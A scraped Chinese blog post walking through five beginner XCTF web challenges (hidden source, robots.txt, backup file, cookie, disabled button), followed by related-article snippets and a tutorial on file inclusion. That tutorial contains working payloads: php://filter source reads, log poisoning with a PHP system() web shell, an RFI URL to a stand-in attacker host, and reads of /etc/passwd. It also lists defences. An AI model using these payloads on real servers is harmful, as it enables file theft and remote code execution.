XCTF 攻防世界 WEB练习题1-5

网页源码查看与安全漏洞利用技巧
最新推荐文章于 2024-08-02 16:36:00 发布
原创 最新推荐文章于 2024-08-02 16:36:00 发布 · 242 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web

本文介绍了几种在在线场景中查看网页源码和利用robots协议、备份文件、Cookie以及处理禁用按钮的方法来获取隐藏信息。通过查看源码、编辑robots.txt、查找备份文件如index.php.bak、分析Cookie数据以及解除按钮的disabled属性,可以揭示隐藏的PHP文件和获取flag。这些技巧在网络安全和Web开发中具有重要应用。

1、view_source

 进入在线场景发现无法通过鼠标右键查看源代码,我们可以直接按F12键打开开发人员工具,即可查看网页源码

2、robots

robots协议:

robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。

在URL后加上robots.txt

可以看到flag_1s_h3re.php显示禁止爬取

所以在 URL后加上f1ag_1s_h3re.php即可获取带有flag的PHP文件

3、backup

进入场景之后可以看到如下文字

在这里插入图片描述

我们在搜素引擎上搜索index.php的备份文件名,得到index.php的备份文件名为index.php.bak

我们直接在 URL后加上index.php.bak即可获取带有flag的PHP文件

4、cookie

Cookie
Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。

根据标题提示cookie,我们先去查看浏览器的cookie,发现look-here,值为cookie.php

我们查看cookie.php,在开发人员工具中选择网络,获取响应头数据,即可获得flag

5、disabled_button

看到这个题,我们先查看源码

在这里插入图片描述

 发现写有disabled属性,disabled可设置或返回是否禁用单选按钮。所以删掉disabled属性,再点击按钮即可

xctf部分题目
keaixiaohan的博客
09-24 458
xctf部分题目 ​ 一、CandyShop 通过观察页面发现了帐号登录功能,尝试sql注入与xss无果,,尝试注册帐号,可以注册帐号,但所有帐号均未激活,通过审计源码(这里先通过工具seay审计,但是seay只能找出可能存在漏洞的函数,对于这种题目而言,只能通过人工审计。),发现了一个已经激活的帐号,但是无密码。 let users = client.db('test').collection('users') users.deleteMany(err => { if (...
XCTF练习题---MISC---3-11
liu914589417的博客
07-07 493
XCTF练习题—MISC—3-11 flag:FLAG{LSB_i5_SO_EASY} 解题思路: 1、观察题目,下载附件 2、下载后是一张图片,根据习惯直接Stegsolve打开查看 3、通过各种方法没有找到任何答案,判断可能是RGB或LSB图片隐写,按照习惯进行设置,发现是一个压缩包格式文件 4、转换为压缩包格式,发现其中有flag值,可是Windows提取不出来,直接上Kali打开 5、拿到这么多值,一看结尾是=号,判断是base64,尝试一下base64解码。发现开头有点东西,png格式
XCTF练习题---MISC---小小的PDF
liu914589417的博客
04-28 743
XCTF练习题—MISC—小小的PDF flag:flag:SYC{so_so_so_easy} 解题步骤: 1、观察题目,下载附件 2、下载完发现是一个PDF文件,经过转Word,查看属性,十六进制查看后一无所获 3、经过判断,尝试看看Kali的Binwalk,开启Kali,直接扔进去进行拆解,命令:binwalk a4f37ec070974eadab9b96abd5ddffed.pdf 4、经过拆分发现其中有3个图片,而PDF里只有两张图片,从而推测第三张图片就是flag,直接dd拷贝出来。 命令
XCTF练习题---MISC---hong
liu914589417的博客
11-25 401
XCTF练习题—MISC—hong flag:BCTF{cute&fat_cats_does_not_like_drinking} 解题步骤: 1、观察题目,下载附件 2、下载文件后发现是一个.mp3的音乐文件,打开无法运行,放在Winhex和Audacity中并找不到有价值的信息,直接上Kali的binwalk 3、经过文件分析发现存在两个Jpeg的图片格式文件,既然如此开始进行拆分,使用命令foremost进行拆分 4、打开生成的文件夹,其中有一个jpg文件夹,里面有两张图片 5、经过简
XCTF攻防世界web进阶练习_ 1_NewsCenter
silence1_的博客
04-30 3293
XCTF攻防世界web进阶练习—NewsCenter 题目 题目是NewsCenter,没有提示信息。 打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。 随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。 将http头保存为1.txt,试试用sqlmap爆数据库 ...
XCTF攻防世界练习区-web-simple_js
果冻先生的专栏
09-24 2163
0x07 simple js 【题目描述】 小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 【目标】 掌握有关js的知识。查看页面源码,了解js和读懂代码。 【解题思路】 F12查看网页源代码,找到index文件,仔细阅读js代码。(或者view-source:命令) 先输入一个password厂商一下返回的结果。 查看...
XCTF攻防世界练习区简单题-web-GET Post
果冻先生的专栏
10-30 1172
0x02. get post 【题目描述】:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? 【目标】 了解http请求方法,此处考察get和post两个最常用的请求方法。HTTP协议中共定义了八种方法或者叫“动作”来表明对Request-URI指定的资源的不同操作方式,具体介绍如下: ·GET:向特定的资源发出请求。 ·POST:向指定资源提交数据进行处理请求(例...
XCTF攻防世界练习区-web-Robots
果冻先生的专栏
09-19 1165
0x03. Robots 【题目描述】 X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 【目标】 掌握robots协议的知识。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索爬虫访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索爬虫就会按照该文件中的内容来确定访问的范围;如...
xctf攻防世界 CRYPTO高手进阶区 wtc_rsa_bbq
l8947943的博客
02-21 4609
0x01. 进入环境,下载附件 给了一个压缩包文件,打开后发现没有其他信息,用winhex打开,发现开头是以PK开始的,如图: 0x02. 问题分析 0x02_1. 修改为zip 将文件修改为.zip文件,然后进行解压,发现有两个文件: 0x02_2. 查看pem文件内容 在kali中打开pem文件,查看加密信息 openssl rsa -pubin -in key.pem -text -modulus > out.txt 具体信息如下: RSA Public-Key: (8587 bit) M
XCTF攻防世界练习区-web-backup
果冻先生的专栏
09-19 639
0x05.cookie 【题目描述】 X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗? 【目标】 掌握有关cookie的知识。 Cookie是当主机访问Web服务器时,是由Web服务器创建的,将信息存储在用户计算机上的文件。一般网络用户习惯用其复数形式 Cookies,指某些网站为了辨别用户身份、进行Session 跟踪而存储在用户本地终端上的数据,...
【愚公系列】202112月 攻防世界-进阶题-MISC-073(5-1)
时光隧道
12-09 3万+
文章目录一、5-1二、答题步骤1.xortool(异或工具)2.加密命令3.解密命令4.解题总结 一、5-1 题目链接:https://adworld.xctf.org.cn/task/task_list?type=misc&number=1&grade=1&page=5 二、答题步骤 1.xortool(异或工具) xortool是一个多字节异或加密破解工具。 基本异或、加法、SUB 和 ROR/L 计算器 加密/解密文件 在文件中搜索编码的字符串 分析文件(字节匹配项) 在
DASCTF 2023六月挑战赛|二进制专项 PWN (上)
susu_xiaosu的博客
07-22 474
【代码】DASCTF 2023六月挑战赛|二进制专项 PWN (上)
xctf embarrass
pondzhang的专栏
12-09 278
蓝桥杯 Candy Store(java代码)
weixin_57391565的博客
12-06 290
蓝桥杯 Candy Store 看到优快云中没有此题的java代码,把我刚刚做的分享一下吧。 总的算法思路可以去看https://blog.youkuaiyun.com/weixin_46990037/article/details/105455390 我也是看着他的思路来做的,不过java的具体实现还是有很多细节的。 public class CandyStore { public static void main(String[] args) { Scanner scanner = new
攻防世界CTF|web方向】第三题:view_source
weixin_70825534的博客
08-02 1051
2.思考:这道题目涉及的知识点很简单,但我把它写在博客里的原因是,作为网络安全的初学者,我们要树立一个基本认知,网络源码是万物之源,能够读懂网页源码才能够谈维护网站的安全,或是找网站的漏洞,才能够发展维护网络安全的底层能力,才能够在这条路上走得更久。虽然web方向对开发代码的要求不高,但我们要能够读懂或是理解一些关键代码节点,才能更好维护。要求我们找网页源码,但鼠标右键访问方式在这个界面无效,我们换其他的方式。都能够查找网页源码,找到的源码如下。1.知识点:查找网站源码的方法。2.查找网页源码的其他方式。
ctf学习经历——极客部分题解
qq_51604088的博客
11-21 1424
解题思路 Web 朋友的学妹 1,根据提示:打开 得到 2,找到flag。 EZWWW 1,打开网站,发现备份 2,用御剑:扫描后台 3,得备份的压缩包,打开 4,分析代码:base64_decode(‘c3ljbDB2ZXI=’); 知是base64加密。百度在线解码。得sycl0ver 5,用postman的post请求:得flag 刘壮的黑页 1,打开网页,得到 2,用postman,get方式和post方式:用GET方法输入key=username,value=admin,用POST.
西湖论剑 Flagshop 分析复现
蚁景网安学院
10-20 693
亲爱的,关注我吧10/20文章共计2264个词预计阅读10分钟来和我一起阅读吧前言比赛时候没能做出来,其实这道题就是一道pwn题。后面与p w n师傅讨论分析EXP分析还原了解题过程。学...
CTF 题目练习题
热门推荐
syh_486_007的专栏
06-01 3万+
入门----从基础题目出发(推荐资源): http://ctf.idf.cn !!!首推 idf实验室:题目非常基础,只1个点 www.ichunqiu.com 有线下决赛题目复现 http://oj.xctf.org.cn/xctf 题库网站,历年题,练习场,比较难 www.wechall.net/challs !!!!!!非常入门的国外ctf题库,很多国内都是从这里刷题成长起来的
ctf题库--欢迎来到地狱
miko2018的博客
08-21 2万+
<题目> 连环套哦。格式CTF{xxxx}。 解题链接: http://ctf5.shiyanbar.com/stega/hell/欢迎来到地狱.zip <解答> 这道题非常有意思、涉及到的知识也比较多,因此这一次解答会写的详细一些。 ※下载文件并解压,打开文件夹,里面有一张图片、一个文件和一个压缩包。 双击图片发现无法打开、而doc文件也是显示被加了密的,z...
文件包含漏洞习题攻防世界
最新发布
04-03
<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** - 低安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

枫糖丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值